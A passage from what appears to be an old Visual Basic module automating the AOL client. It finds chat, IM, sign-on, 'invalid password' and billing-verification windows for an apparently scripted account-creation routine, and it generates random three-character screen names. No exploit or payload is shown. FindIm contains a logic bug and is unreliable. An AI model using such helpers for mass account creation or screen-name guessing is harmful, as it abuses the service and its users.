  3352. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Are You Sure You Want to Cancel") <> 0& Then
  3353. FindCancel& = mWin&
  3354. Exit Function
  3355. End If
  3356. Loop Until mWin& = 0&
  3357. End If
  3358. FindCancel& = mWin&
  3359. End Function
  3360.  
  3361. Public Function FindCancel2() As Long
  3362. 'this function helps find 1
  3363. 'of the modals using in the
  3364. '"createicase" function
  3365. Dim mWin As Long, mStatic As Long
  3366. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3367. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3368. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Thanks for Trying!") <> 0& Then
  3369. FindCancel2& = mWin&
  3370. Exit Function
  3371. Else
  3372. Do
  3373. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3374. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3375. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Thanks for Trying!") <> 0& Then
  3376. FindCancel2& = mWin&
  3377. Exit Function
  3378. End If
  3379. Loop Until mWin& = 0&
  3380. End If
  3381. FindCancel2& = mWin&
  3382. End Function
  3383.  
  3384. Public Function FindCheckout() As Long
  3385. 'this function helps find 1
  3386. 'of the modals using in the
  3387. '"createicase" function
  3388. Dim mWin As Long
  3389. mWin& = FindWindow("_AOL_Modal", "AOL Quick Checkout")
  3390. FindCheckout& = mWin&
  3391. End Function
  3392.  
  3393. Public Function FindChooseSN() As Long
  3394. 'finds 1 of the modals
  3395. 'in the "create" sub
  3396. Dim tWin As Long, tWin2 As Long
  3397.  
  3398. tWin& = FindWindow("_AOL_Modal", "Step 1 of 4: Choose a Screen Name")
  3399. tWin2& = FindWindow("_AOL_Modal", "Step 1 of 4: Choose Another Screen Name")
  3400. If tWin& <> 0& Then
  3401. FindChooseSN = tWin&
  3402. ElseIf tWin2& <> 0& Then
  3403. FindChooseSN = tWin2&
  3404. Else
  3405. FindChooseSN = 0&
  3406. End If
  3407. End Function
  3408.  
  3409. Public Function FindEditBuddyList() As Long
  3410. 'finds the window to edit a buddy group
  3411. Dim aol As Long, mdi As Long, eWin As Long
  3412.  
  3413. aol& = FindWindow("AOL Frame25", vbNullString)
  3414. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3415. eWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3416.  
  3417. If InStr(1, GetText(eWin&), "Edit List") <> 0& Then
  3418. FindEditBuddyList& = eWin&
  3419. Exit Function
  3420. Else
  3421. Do
  3422. eWin& = FindWindowEx(mdi&, eWin&, "AOL Child", vbNullString)
  3423. If InStr(1, GetText(eWin&), "Edit List") <> 0& Then
  3424. FindEditBuddyList& = eWin&
  3425. Exit Function
  3426. End If
  3427. Loop Until eWin& = 0&
  3428. End If
  3429.  
  3430. FindEditBuddyList& = eWin&
  3431. End Function
  3432.  
  3433. Public Function FindGuestSignOn() As Long
  3434. 'finds aol's guest signon box
  3435. Dim mWin As Long, mStatic As Long
  3436. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3437. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3438. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Guest Sign-On") <> 0& Then
  3439. FindGuestSignOn& = mWin&
  3440. Exit Function
  3441. Else
  3442. Do
  3443. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3444. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3445. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Guest Sign-On") <> 0& Then
  3446. FindGuestSignOn& = mWin&
  3447. Exit Function
  3448. End If
  3449. Loop Until mWin& = 0&
  3450. End If
  3451. FindGuestSignOn& = mWin&
  3452. End Function
  3453.  
  3454. Public Function FindIgnore() As Long
  3455. 'finds chat ignore window
  3456. Dim aol As Long, mdi As Long, xWin As Long
  3457. Dim xCheck As Long, xIcon As Long
  3458. Dim xGlyph As Long, xStatic As Long
  3459. aol& = FindWindow("AOL Frame25", vbNullString)
  3460. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3461. xWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3462. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Checkbox", vbNullString)
  3463. xStatic& = FindWindowEx(xWin&, 0&, "_AOL_Static", vbNullString)
  3464. xGlyph& = FindWindowEx(xWin&, 0&, "_AOL_Glyph", vbNullString)
  3465. xIcon& = FindWindowEx(xWin&, 0&, "_AOL_Icon", vbNullString)
  3466. xIcon& = FindWindowEx(xWin&, xIcon&, "_AOL_Icon", vbNullString)
  3467. If GetText(xWin&) <> "Write Mail" And xCheck& <> 0& And xStatic& <> 0& And xGlyph& <> 0& And xIcon& <> 0& Then
  3468. FindIgnore& = xWin&
  3469. Exit Function
  3470. Else
  3471. Do
  3472. xWin& = FindWindowEx(mdi&, xWin&, "AOL Child", vbNullString)
  3473. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Checkbox", vbNullString)
  3474. xStatic& = FindWindowEx(xWin&, 0&, "_AOL_Static", vbNullString)
  3475. xGlyph& = FindWindowEx(xWin&, 0&, "_AOL_Glyph", vbNullString)
  3476. xIcon& = FindWindowEx(xWin&, 0&, "_AOL_Icon", vbNullString)
  3477. xIcon& = FindWindowEx(xWin&, xIcon&, "_AOL_Icon", vbNullString)
  3478. If GetText(xWin&) <> "Write Mail" And xCheck& <> 0& And xStatic& <> 0& And xGlyph& <> 0& And xIcon& <> 0& Then
  3479. FindIgnore& = xWin&
  3480. Exit Function
  3481. End If
  3482. Loop Until xWin& = 0&
  3483. End If
  3484. FindIgnore& = xWin&
  3485. End Function
  3486.  
  3487. Public Function FindIgnore25() As Long
  3488. 'finds the chat ignore window for aol 2.5 / 3.0
  3489. Dim aol As Long, mdi As Long, xWin As Long
  3490. Dim xCheck As Long, xIcon As Long
  3491. Dim xGlyph As Long, xStatic As Long
  3492.  
  3493. aol& = FindWindow("AOL Frame25", vbNullString)
  3494. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3495.  
  3496. xWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3497. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Button", vbNullString)
  3498. xStatic& = FindWindowEx(xWin&, 0&, "_AOL_Static", vbNullString)
  3499. xGlyph& = FindWindowEx(xWin&, 0&, "_AOL_Glyph", vbNullString)
  3500. xIcon& = FindWindowEx(xWin&, 0&, "_AOL_Icon", vbNullString)
  3501. xIcon& = FindWindowEx(xWin&, xIcon&, "_AOL_Icon", vbNullString)
  3502. If GetText(xWin&) <> "Write Mail" And xCheck& <> 0& And xStatic& <> 0& And xGlyph& <> 0& And xIcon& <> 0& Then
  3503. FindIgnore25& = xWin&
  3504. Exit Function
  3505. Else
  3506. Do
  3507. xWin& = FindWindowEx(mdi&, xWin&, "AOL Child", vbNullString)
  3508. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Button", vbNullString)
  3509. xStatic& = FindWindowEx(xWin&, 0&, "_AOL_Static", vbNullString)
  3510. xGlyph& = FindWindowEx(xWin&, 0&, "_AOL_Glyph", vbNullString)
  3511. xIcon& = FindWindowEx(xWin&, 0&, "_AOL_Icon", vbNullString)
  3512. xIcon& = FindWindowEx(xWin&, xIcon&, "_AOL_Icon", vbNullString)
  3513. If GetText(xWin&) <> "Write Mail" And xCheck& <> 0& And xStatic& <> 0& And xGlyph& <> 0& And xIcon& <> 0& Then
  3514. FindIgnore25& = xWin&
  3515. Exit Function
  3516. End If
  3517. Loop Until xWin& = 0&
  3518. End If
  3519. FindIgnore25& = xWin&
  3520. End Function
  3521.  
  3522. Public Function FindIm() As Long
  3523. 'finds an instant
  3524. 'message window on aol
  3525. Dim ims As Long, imR As Long
  3526.  
  3527. ims& = FindSentIM&
  3528. imR& = FindReceivedIM&
  3529.  
  3530. If ims& <> 0& Then
  3531. FindIm& = ims&
  3532. ElseIf ims& <> 0& Then
  3533. FindIm& = imR&
  3534. Else
  3535. FindIm& = 0&
  3536. End If
  3537. End Function
  3538.  
  3539. Public Function FindInternet() As Long
  3540. 'this function helps find 1
  3541. 'of the modals using in the
  3542. '"createicase" function
  3543. Dim mWin As Long, mStatic As Long
  3544. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3545. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3546. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "official aol internet guide") <> 0& Then
  3547. FindInternet& = mWin&
  3548. Exit Function
  3549. Else
  3550. Do
  3551. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3552. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3553. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "the official aol internet guide") <> 0& Then
  3554. FindInternet& = mWin&
  3555. Exit Function
  3556. End If
  3557. Loop Until mWin& = 0&
  3558. End If
  3559. FindInternet& = mWin&
  3560. End Function
  3561.  
  3562. Public Function FindInvalidPW() As Long
  3563. 'finds aol's invalid password box
  3564. Dim mWin As Long, mStatic As Long
  3565. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3566. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3567. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Invalid password, please re-enter:") <> 0& Then
  3568. FindInvalidPW& = mWin&
  3569. Exit Function
  3570. Else
  3571. Do
  3572. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3573. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3574. If mStatic& <> 0& And InStr(1, GetText(mStatic&), "Invalid password, please re-enter:") <> 0& Then
  3575. FindInvalidPW& = mWin&
  3576. Exit Function
  3577. End If
  3578. Loop Until mWin& = 0&
  3579. End If
  3580. FindInvalidPW& = mWin&
  3581. End Function
  3582.  
  3583. Public Function FindLocate() As Long
  3584. 'finds the locate window
  3585. Dim aol As Long, mdi As Long, lWin As Long
  3586. aol& = FindWindow("AOL Frame25", vbNullString)
  3587. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3588. lWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3589. If InStr(1, GetText(lWin&), "Locate") <> 0& And GetText(lWin&) <> "Locate Member Online" Then
  3590. FindLocate& = lWin&
  3591. Exit Function
  3592. Else
  3593. Do
  3594. lWin& = FindWindowEx(mdi&, lWin&, "AOL Child", vbNullString)
  3595. If InStr(1, GetText(lWin&), "Locate") <> 0& And GetText(lWin&) <> "Locate Member Online" Then
  3596. FindLocate& = lWin&
  3597. Exit Function
  3598. End If
  3599. Loop Until lWin& = 0&
  3600. End If
  3601. FindLocate& = lWin&
  3602. End Function
  3603.  
  3604. Public Function FindMail() As Long
  3605. 'finds the mail window
  3606. Dim aol As Long, mdi As Long, mWin As Long, mWin2 As Long
  3607. aol& = FindWindow("AOL Frame25", vbNullString)
  3608. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3609.  
  3610. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Write Mail")
  3611. mWin2& = FindWindowEx(mdi&, 0&, "AOL Child", "Compose Mail")
  3612.  
  3613. If mWin& <> 0& Then
  3614. FindMail& = mWin&
  3615. ElseIf mWin2& <> 0& Then
  3616. FindMail& = mWin2&
  3617. Else
  3618. FindMail& = 0&
  3619. End If
  3620. End Function
  3621.  
  3622. Public Function FindReceivedIM() As Long
  3623. 'finds recieved im on aol
  3624. Dim aol As Long, mdi As Long, IMWin As Long
  3625. aol& = FindWindow("AOL Frame25", vbNullString)
  3626. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3627. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3628. If InStr(1, GetText(IMWin&), "Instant Message") <> 0& And InStr(1, GetText(IMWin&), ">") <> 0& Then
  3629. FindReceivedIM& = IMWin&
  3630. Exit Function
  3631. Else
  3632. Do
  3633. IMWin& = FindWindowEx(mdi&, IMWin&, "AOL Child", vbNullString)
  3634. If InStr(1, GetText(IMWin&), "Instant Message") <> 0& And InStr(1, GetText(IMWin&), ">") <> 0& Then
  3635. FindReceivedIM& = IMWin&
  3636. Exit Function
  3637. End If
  3638. Loop Until IMWin& = 0&
  3639. End If
  3640. FindReceivedIM& = IMWin&
  3641. End Function
  3642.  
  3643. Public Function FindRoom() As Long
  3644. 'finds aol chatroom
  3645. Dim aol As Long, mdi As Long, cWin As Long, cRich As Long
  3646. Dim cList As Long, cIcon As Long, cCombo As Long
  3647.  
  3648. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  3649. FindRoom& = FindRoom25&
  3650. Exit Function
  3651. End If
  3652.  
  3653. aol& = FindWindow("AOL Frame25", vbNullString)
  3654. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3655. cWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3656. cRich& = FindWindowEx(cWin&, 0&, "RICHCNTL", vbNullString)
  3657. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  3658. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  3659. cCombo& = FindWindowEx(cWin&, 0&, "_AOL_Combobox", vbNullString)
  3660.  
  3661. If cRich& <> 0& And cList& <> 0& And cIcon& <> 0& And cCombo& <> 0& And Left(GetText(cWin&), 3) <> "AOL" Then
  3662. FindRoom& = cWin&
  3663. Exit Function
  3664. Else
  3665.  
  3666. Do
  3667. cWin& = FindWindowEx(mdi&, cWin&, "AOL Child", vbNullString)
  3668. cRich& = FindWindowEx(cWin&, 0&, "RICHCNTL", vbNullString)
  3669. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  3670. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  3671. cCombo& = FindWindowEx(cWin&, 0&, "_AOL_Combobox", vbNullString)
  3672. If cRich& <> 0& And cList& <> 0& And cIcon& <> 0& And cCombo& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  3673. FindRoom& = cWin&
  3674. Exit Function
  3675. End If
  3676. Loop Until cWin& = 0&
  3677.  
  3678. End If
  3679. FindRoom& = cWin&
  3680. End Function
  3681.  
  3682. Public Function FindRoom25() As Long
  3683. 'finds aol's chatroom on aol 2.5 and 3.0
  3684. Dim aol As Long, mdi As Long, cWin As Long, cView As Long
  3685. Dim cList As Long, cIcon As Long
  3686.  
  3687. aol& = FindWindow("AOL Frame25", vbNullString)
  3688. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3689. cWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3690. cView& = FindWindowEx(cWin&, 0&, "_AOL_View", vbNullString)
  3691. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  3692. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  3693.  
  3694. If cView& <> 0& And cList& <> 0& And cIcon& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  3695. FindRoom25& = cWin&
  3696. Exit Function
  3697. Else
  3698.  
  3699. Do
  3700. cWin& = FindWindowEx(mdi&, cWin&, "AOL Child", vbNullString)
  3701. cView& = FindWindowEx(cWin&, 0&, "_AOL_View", vbNullString)
  3702. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  3703. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  3704. If cView& <> 0& And cList& <> 0& And cIcon& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  3705. FindRoom25& = cWin&
  3706. Exit Function
  3707. End If
  3708. Loop Until cWin& = 0&
  3709.  
  3710. End If
  3711. FindRoom25& = cWin&
  3712. End Function
  3713.  
  3714. Public Function FindSentIM() As Long
  3715. 'finds sent im on aol
  3716. Dim aol As Long, mdi As Long, IMWin As Long, imString As String
  3717. aol& = FindWindow("AOL Frame25", vbNullString)
  3718. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3719. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3720. imString$ = GetText(IMWin&)
  3721. If InStr(1, imString$, "Instant Message") <> 0& And InStr(1, imString$, ">") = 0& And InStr(1, imString$, "Send") = 0& Then
  3722. FindSentIM& = IMWin&
  3723. Exit Function
  3724. Else
  3725. Do
  3726. IMWin& = FindWindowEx(mdi&, IMWin&, "AOL Child", vbNullString)
  3727. imString$ = GetText(IMWin&)
  3728. If InStr(1, imString$, "Instant Message") <> 0& And InStr(1, imString$, ">") = 0& And InStr(1, imString$, "Send") = 0& Then
  3729. FindSentIM& = IMWin&
  3730. Exit Function
  3731. End If
  3732. Loop Until IMWin& = 0&
  3733. End If
  3734. FindSentIM& = IMWin&
  3735. End Function
  3736.  
  3737. Public Function FindSignOnWindow() As Long
  3738. 'finds the signon window [for all aol versions]
  3739. Dim aol As Long, mdi As Long, so As Long, gb As Long, WC As Long
  3740.  
  3741. aol& = FindWindow("AOL Frame25", vbNullString)
  3742. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3743.  
  3744. so& = FindWindowEx(mdi&, 0&, "AOL Child", "Sign On")
  3745. gb& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye From America Online!")
  3746. WC& = FindWindowEx(mdi&, 0&, "AOL Child", "Welcome")
  3747.  
  3748. If so& <> 0& Then
  3749. FindSignOnWindow = so&
  3750. ElseIf gb& <> 0& Then
  3751. FindSignOnWindow = gb&
  3752. ElseIf WC& <> 0& Then
  3753. FindSignOnWindow = WC&
  3754. Else
  3755. FindSignOnWindow = 0&
  3756. End If
  3757.  
  3758. End Function
  3759.  
  3760. Public Function FindTour() As Long
  3761. 'this function helps find 1
  3762. 'of the modals using in the
  3763. '"createicase" function
  3764. Dim mWin As Long, mStatic As Long
  3765. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3766. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3767. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "the official aol tour guide") <> 0& Then
  3768. FindTour& = mWin&
  3769. Exit Function
  3770. Else
  3771. Do
  3772. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3773. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3774. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "the official aol tour guide") <> 0& Then
  3775. FindTour& = mWin&
  3776. Exit Function
  3777. End If
  3778. Loop Until mWin& = 0&
  3779. End If
  3780. FindTour& = mWin&
  3781. End Function
  3782.  
  3783. Public Function FindTransferWin() As Long
  3784. 'finds the 'file transfer complete' modal
  3785. Dim tWin As Long, tSta As Long
  3786. tWin& = FindWindow("_AOL_Modal", vbNullString)
  3787. tSta& = FindWindowEx(tWin&, 0&, "_AOL_Static", vbNullString)
  3788. If InStr(1, GetText(tSta&), "File transfer complete") <> 0& Then
  3789. FindTransferWin& = tWin&
  3790. Exit Function
  3791. Else
  3792. Do
  3793. tWin& = FindWindowEx(0&, tWin&, "_AOL_Modal", vbNullString)
  3794. tSta& = FindWindowEx(tWin&, 0&, "_AOL_Static", vbNullString)
  3795. If InStr(1, GetText(tSta&), "File transfer complete.") <> 0& Then
  3796. FindTransferWin& = tWin&
  3797. Exit Function
  3798. End If
  3799. Loop Until tWin& = 0&
  3800. End If
  3801. If InStr(1, GetText(tSta&), "File transfer complete.") <> 0& Then
  3802. FindTransferWin& = tWin&
  3803. End If
  3804. End Function
  3805.  
  3806. Public Function FindUploadWin() As Long
  3807. 'finds file transfer window
  3808. Dim uWin As Long
  3809. uWin& = FindWindow("_AOL_Modal", vbNullString)
  3810. If InStr(1, GetText(uWin&), "File Transfer") <> 0& Then
  3811. FindUploadWin& = uWin&
  3812. Exit Function
  3813. Else
  3814. Do
  3815. uWin& = FindWindowEx(0&, uWin&, "_AOL_Modal", vbNullString)
  3816. If InStr(1, GetText(uWin&), "File Transfer") <> 0& Then
  3817. FindUploadWin& = uWin&
  3818. Exit Function
  3819. End If
  3820. Loop Until uWin& = 0&
  3821. End If
  3822. If InStr(1, GetText(uWin&), "File Transfer") <> 0& Then
  3823. FindUploadWin& = uWin&
  3824. Else
  3825. FindUploadWin& = 0&
  3826. End If
  3827. End Function
  3828.  
  3829. Public Function FindVerify() As Long
  3830. 'this function helps find 1
  3831. 'of the modals using in the
  3832. '"createicase" function
  3833. Dim mWin As Long, mStatic As Long
  3834. mWin& = FindWindow("_AOL_Modal", vbNullString)
  3835. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3836. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "verify your billing") <> 0& Then
  3837. FindVerify& = mWin&
  3838. Exit Function
  3839. Else
  3840. Do
  3841. mWin& = FindWindowEx(0&, mWin&, "_AOL_Modal", vbNullString)
  3842. mStatic& = FindWindowEx(mWin&, 0&, "_AOL_Static", vbNullString)
  3843. If mStatic& <> 0& And InStr(1, LCase(GetText(mStatic&)), "verify your billing") <> 0& Then
  3844. FindVerify& = mWin&
  3845. Exit Function
  3846. End If
  3847. Loop Until mWin& = 0&
  3848. End If
  3849. FindVerify& = mWin&
  3850. End Function
  3851.  
  3852. Public Function FindWelcome() As Long
  3853. 'returns the hWnd of the welcome window
  3854. Dim aol As Long, mdi As Long, wWin As Long
  3855. aol& = FindWindow("AOL Frame25", vbNullString)
  3856. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  3857. wWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  3858. If InStr(1, GetText(wWin&), "Welcome, ") <> 0& Then
  3859. FindWelcome = wWin&
  3860. Exit Function
  3861. Else
  3862. Do
  3863. DoEvents
  3864. wWin& = FindWindowEx(mdi&, wWin&, "AOL Child", vbNullString)
  3865. If InStr(1, GetText(wWin&), "Welcome, ") <> 0& Then
  3866. FindWelcome = wWin&
  3867. Exit Function
  3868. End If
  3869.  
  3870. Loop Until wWin& = 0&
  3871. FindWelcome = wWin&
  3872. Exit Function
  3873. End If
  3874. FindWelcome = wWin&
  3875. End Function
  3876.  
  3877. Public Sub FormCircle(frm As Form, size As Long)
  3878. Dim e As Long
  3879.  
  3880. 'makes for do a circle.. [as seen in pH]
  3881. 'make size between 1 and 100 about..
  3882. 'example:
  3883. '
  3884. 'Call FormCircle(Me, 20)
  3885.  
  3886. For e& = size& - 1 To 0 Step -1
  3887. frm.Left = frm.Left - e&
  3888. frm.Top = frm.Top + (size& - e&)
  3889. Next e&
  3890.  
  3891. For e& = size& - 1 To 0 Step -1
  3892. frm.Left = frm.Left + (size& - e&)
  3893. frm.Top = frm.Top + e&
  3894. Next e&
  3895.  
  3896. For e& = size& - 1 To 0 Step -1
  3897. frm.Left = frm.Left + e&
  3898. frm.Top = frm.Top - (size& - e&)
  3899. Next e&
  3900.  
  3901. For e& = size& - 1 To 0 Step -1
  3902. frm.Left = frm.Left - (size& - e&)
  3903. frm.Top = frm.Top - e&
  3904. Next e&
  3905. End Sub
  3906.  
  3907. Public Sub FormDrag(frm As Form)
  3908. 'self explanatory
  3909. Call ReleaseCapture
  3910. Call SendMessage(frm.hWnd, WM_SYSCOMMAND, WM_MOVE, 0)
  3911. Call SnapCheck(frm)
  3912. End Sub
  3913.  
  3914. Public Sub FormFlash(frm As Form)
  3915. Dim frmColor As Double, lngCount As Long
  3916. 'flashes the specified form
  3917.  
  3918. frmColor = frm.BackColor
  3919.  
  3920. For lngCount& = 1& To 10&
  3921. frm.BackColor = &HFF&
  3922. pause (0.001)
  3923. frm.BackColor = &H80FF&
  3924. pause (0.001)
  3925. frm.BackColor = &HFFFF&
  3926. pause (0.001)
  3927. frm.BackColor = &HFF00&
  3928. pause (0.001)
  3929. frm.BackColor = &HFF0000
  3930. pause (0.001)
  3931. frm.BackColor = &HFF00FF
  3932. pause (0.001)
  3933. Next lngCount&
  3934.  
  3935. frm.BackColor = frmColor
  3936. End Sub
  3937.  
  3938. Public Sub FormNotOnTop(frm As Form)
  3939. 'self explanatory
  3940. Call SetWindowPos(frm.hWnd, HWND_NOTOPMOST, 0&, 0&, 0&, 0&, FLAGS)
  3941. End Sub
  3942.  
  3943. Public Sub FormOntop(frm As Form)
  3944. 'self explanatory
  3945. Call SetWindowPos(frm.hWnd, HWND_TOPMOST, 0&, 0&, 0&, 0&, FLAGS)
  3946. End Sub
  3947.  
  3948.  
  3949. Public Sub Generate3Letters(HowManySNs As Integer, list As ListBox)
  3950. 'self explanatory
  3951. 'thx db
  3952. Dim AlphaNumericString As String, AlphaString As String
  3953. Dim strLetter As String, SN As String, RandomTime As String
  3954. Dim rndX As Integer, rndY As Integer, MakinSNs As Integer, i As Long
  3955.  
  3956. Randomize
  3957. RandomTime = Int(10 * Rnd)
  3958. If RandomTime = 10 Then RandomTime = 9
  3959.  
  3960. AlphaNumericString = "1234567890abcdefghijklmnopqrstuvwxyz"
  3961. AlphaString = "abcdefghijklmnopqrstuvwxyz"
  3962.  
  3963. Do While MakinSNs <> HowManySNs
  3964. DoEvents
  3965. SN = ""
  3966.  
  3967. For i = 0 To RandomTime
  3968. rndX = Int((26 - 1 + 1) * Rnd + 1)
  3969. Next i
  3970. strLetter = Mid(AlphaString, rndX, 1)
  3971. SN = SN + strLetter
  3972.  
  3973. For i = 0 To HowManySNs
  3974. rndY = Int((36 - 1 + 1) * Rnd + 1)
  3975. Next i
  3976. strLetter = Mid(AlphaNumericString, rndY, 1)
  3977. SN = SN + strLetter
  3978.  
  3979. For i = 0 To RandomTime
  3980. rndY = Int((36 - 1 + 1) * Rnd + 1)
  3981. Next i
  3982. strLetter = Mid(AlphaNumericString, rndY, 1)
  3983. SN = SN + strLetter
  3984.  
  3985. list.AddItem SN
  3986. MakinSNs = MakinSNs + 1
  3987. Loop
  3988. End Sub
  3989.  
  3990. Public Sub Generate3Letters_LettersOnly(HowManySNs As Integer, list As ListBox)
  3991. 'self explanatory
  3992. 'thx db
  3993. Dim AlphaNumericString As String, AlphaString As String
  3994. Dim strLetter As String, SN As String, RandomTime As String
  3995. Dim rndX As Integer, rndY As Integer, MakinSNs As Integer, i As Long
  3996.  
  3997. Randomize
  3998. RandomTime = Int(10 * Rnd)
  3999. If RandomTime = 10 Then RandomTime = 9
  4000.  
  4001. AlphaNumericString = "1234567890abcdefghijklmnopqrstuvwxyz"
  4002. AlphaString = "abcdefghijklmnopqrstuvwxyz"
  4003.  
  4004. Do While MakinSNs <> HowManySNs
  4005. DoEvents
  4006. SN = ""
  4007.  
  4008. For i = 0 To RandomTime
  4009. rndX = Int((26 - 1 + 1) * Rnd + 1)
  4010. Next i
  4011. strLetter = Mid(AlphaString, rndX, 1)
  4012. SN = SN + strLetter
  4013.  
  4014. For i = 0 To HowManySNs
  4015. rndY = Int((26 - 1 + 1) * Rnd + 1)
  4016. Next i
  4017. strLetter = Mid(AlphaString, rndY, 1)
  4018. SN = SN + strLetter
  4019.  
  4020. For i = 0 To RandomTime
  4021. rndY = Int((26 - 1 + 1) * Rnd + 1)
  4022. Next i
  4023. strLetter = Mid(AlphaString, rndY, 1)
  4024. SN = SN + strLetter
  4025.  
  4026. list.AddItem SN
  4027. MakinSNs = MakinSNs + 1
  4028. Loop
  4029. End Sub
  4030.  
  4031. Public Sub Generate3Letters_Vowels(HowManySNs As Integer, list As ListBox)
  4032. 'self explanatory
  4033. 'makes middle chr of the 3 letter be a vowel
  4034. '[chances are it will spell / sound like a real word]
  4035. Dim AlphaNumericString As String, AlphaString As String
  4036. Dim strLetter As String, SN As String, RandomTime As String
  4037. Dim rndX As Integer, rndY As Integer, MakinSNs As Integer
  4038. Dim VowelString As String, i As Long
  4039.  
  4040. Randomize
  4041. RandomTime = Int(10 * Rnd)
  4042. If RandomTime = 10 Then RandomTime = 9
  4043.  
  4044. AlphaNumericString = "1234567890abcdefghijklmnopqrstuvwxyz"
  4045. VowelString = "aeiouy"
  4046. AlphaString = "abcdefghijklmnopqrstuvwxyz"
  4047.  
  4048. Do While MakinSNs <> HowManySNs
  4049. DoEvents
  4050. SN = ""
  4051.  
  4052. For i = 0 To RandomTime
  4053. rndX = Int((26 - 1 + 1) * Rnd + 1)
  4054. Next i
  4055. strLetter = Mid(AlphaString, rndX, 1)
  4056. SN = SN + strLetter
  4057.  
  4058. Before2nd:
  4059. For i = 0 To HowManySNs
  4060. rndY = Int((6 - 1 + 1) * Rnd + 1)
  4061. Next i
  4062. strLetter = Mid(VowelString, rndY, 1)
  4063. If IsNumeric(strLetter) = True Then GoTo Before2nd
  4064. SN = SN + strLetter
  4065.  
  4066. Before3rd:
  4067. For i = 0 To RandomTime
  4068. rndY = Int((36 - 1 + 1) * Rnd + 1)
  4069. Next i
  4070. strLetter = Mid(AlphaNumericString, rndY, 1)
  4071. If IsNumeric(strLetter) = True Then GoTo Before2nd
  4072. SN = SN + strLetter
  4073.  
  4074. list.AddItem SN
  4075. MakinSNs = MakinSNs + 1
  4076. Loop
  4077. End Sub
  4078.  
  4079. Public Function GetChatText() As String
  4080. 'gets the text from a aol 4.0 chat room
  4081. Dim rWin As Long, rCNTL As Long
  4082.  
  4083. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  4084. GetChatText = GetChatText25
  4085. Exit Function
  4086. End If
  4087.  
  4088. rWin& = FindRoom&
  4089. If rWin& = 0& Then GetChatText$ = "": Exit Function
  4090.  
